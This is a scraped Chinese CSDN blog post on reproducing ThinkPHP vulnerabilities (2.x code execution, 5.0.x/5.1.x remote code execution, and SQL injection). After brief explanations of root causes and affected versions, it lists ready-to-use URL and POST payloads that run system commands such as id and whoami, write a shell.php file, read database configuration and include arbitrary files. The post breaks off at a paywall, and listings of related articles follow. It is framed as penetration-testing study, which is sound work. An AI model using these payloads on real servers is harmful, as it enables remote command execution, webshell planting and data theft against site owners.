漏洞复现—ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞

最新推荐文章于 2024-09-11 12:01:17 发布
最新推荐文章于 2024-09-11 12:01:17 发布
阅读量1.5k 收藏 5
点赞数 2
分类专栏: 渗透测试 文章标签: 安全 thinkphp 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556536/article/details/109988337
版权
本文详细介绍了ThinkPHP框架存在的多个版本的安全漏洞,包括2.x的任意代码执行、<=5.0.23的远程代码执行、5.0.20的命令执行以及5.x系列的SQL注入问题。通过分析漏洞原理、涉及版本和复现过程,揭示了攻击者如何利用这些漏洞进行恶意操作,如创建文件、执行命令和SQL注入。同时,文中提供了漏洞利用的payload和修复建议,强调了安全防护的重要性。
摘要由CSDN通过智能技术生成

ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞

基础知识

  ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。

  模块:thinkphp 所有的主入口文件默认访问index控制器
  方法:thinkphp 所有的控制器默认执行index动作
  构造:http://IP/index.php(或者其它应用入口文件)?s=/模块/控制器/操作/[参数名/参数值…]

漏洞原理

ThinkPHP 2.x 任意代码执行漏洞
  就是在thinkphp的类似于MVC的框架中,存在一个Dispatcher.class.php的文件,它规定了如何解析路由,在该文件中,存在一个函数为static public function dispatch(),此为URL映射控制器,是为了将URL访问的路径映射到该控制器下获取资源的,而当我们输入的URL作为变量传入时,该URL映射控制器会将变量以数组的方式获取出来,从而导致漏洞的产生。
ThinkPHP <=5.0.23 远程代码执行漏洞
  ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
ThinkPHP 5.0.20 远程代码执行漏洞
  由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
ThinkPHP5 in-sqlinjection
  控制了in语句的值位置,即可通过传入一个数组,来造成SQL注入漏洞。

涉及版本

ThinkPHP 2.x
ThinkPHP <=5.0.23
ThinkPHP =5.0.20
ThinkPHP5

漏洞payload梳理(ThinkPHP 5.0.0-5.0.23/5.1.* )

  执行流程:发起请求->路由检测->获取pathinfo信息->路由匹配->路由解析->获得模块、控制器、操作方法调度信息->路由调度->解析模块和类名->组建命名空间>查找并加载类->实例化控制器并调用操作方法->构建响应对象->响应输出->日志保存->程序运行结束

  漏洞原因:路由控制不严谨,默认不开启强制路由,从而可以任意调用Thinkphp的类库

  漏洞思路
            1.因为Request类的method和__construct方法造成的RCE
            2.因为Request类在兼容模式下获取的控制器没有进行合法校验导致的RCE

ThinkPHP 5.1.x

?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

ThinkPHP 5.0.x

?s=index/think\config/get&name=database.username // 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg    // 包含任意文件
?s=index/\think\Config/load&file=../../t.php     // 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami

还有一种:

http://php.local/thinkphp5.0.5/public/index.php?s=index
post
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
_method=__construct&filter[]=system&method=GET&get[]=whoami

ThinkPHP <= 5.0.13:

POST /?
最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2370
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
Thinkphp漏洞复现
weixin_51151498的博客
12-17 1367
Thinkphp漏洞复现
Think.PHP框架漏洞复现
m0_71300782的博客
09-13 1223
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1194
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
ThinkPHP漏洞总结复现
1ance's blog
09-04 1508
ThinkPHP漏洞总结简介版本Thinkphp 2.x 任意代码执行漏洞漏洞原理复现过程修复意见Thinkphp5-5.0.22/5.1.29远程执行代码漏洞漏洞原理影响范围复现过程修复意见Thinkphp5.0.23远程代码执行漏洞漏洞原理影响范围复现过程修复意见Thinkphp5 SQL注入漏洞和敏感信息泄露漏洞漏洞原理影响范围复现过程修复意见 简介   ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
thinkphp漏洞研究与复现
Shanfenglan's blog
11-19 1862
文章目录1. Thinkphp5 5.0.22/5.1.291.1 原理1.2 利用2. ThinkPHP5 5.0.232.1 原理2.2 利用参考文章 1. Thinkphp5 5.0.22/5.1.29 1.1 原理 pathinfo模式路由规则为: pathinfo 方式路由 pathinfo:即全路径的访问控制器方法,如:域名/模块/控制器/方法 pathinfo 方式路由示例 // index模块下index控制器index方法 tp5.com/index/index/index 漏洞是由
ThinkPHP 漏洞复现
最新发布
weixin_74387022的博客
09-11 419
ThinkPHP中,captcha 通常是一个内置的功能,用于生成和验证验证码。同时,也可以在表单验证时使用这个验证码来确保用户输入的是正确的验证码在Hackber,POST上传。s=a/a/a/${phpinfo()} ,运行后发现复现成功。在浏览器打开IP+端口8080 , thinkphp路由的格式是分组/模块/操作名/参数。进入2-rce后运行此靶场 docker-compose up -d。运行此靶场 docker-compose up -d。1.对ThinkPHP2--RCE进行漏洞复现
thinkphp漏洞复现
m0_52920608的博客
11-04 648
thinkphp漏洞复现
ThinkPhp 代码执行 (CNVD-2018-24942)漏洞复现
beichenyyds的博客
03-03 5141
漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本: ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行命令 ls /tmp http://vulfocus.fofa.so:43095/index.php/?s=index/\think\app/invokefunctio
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现(详细图解)
鱼溯的博客
02-02 1404
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现(详细图解)
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
热门推荐
陈瘦瘦的迪迦的博客
12-08 1万+
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现 漏洞形成原因 框架介绍: ThinkPHP是一款运用极广的PHP开发框架。 漏洞引入: 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞如何利用 1、访问靶机地址+端口号 进入首页 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&meth
漏洞复现ThinkPHP3.2.x RCE 漏洞复现
m0_46344990的博客
04-10 4459
目录 一,漏洞描述 二,漏洞发现 三、漏洞利用 本人是一个小白,目前大三计算机专业,出于对网络安全的热爱自学了好久。在学习网络安全的路上简直坎坷,有时候迷茫有时候又找到了方向,全凭自己摸索。啊,真希望有个老师傅能带带我。这也是我第一次复现漏洞,还不会thinkphp框架,就先看视频自学了几天,才把这个漏洞琢磨透。。。结合网上其他文章修改总结了一下。要是有错误或者不合理的地方,也请多多担待。 一,漏洞描述 描述: ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框...
Thinkphp6.0.x反序列化漏洞复现
shinygod的博客
11-20 2301
Thinkphp6.0.x反序列化漏洞复现
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值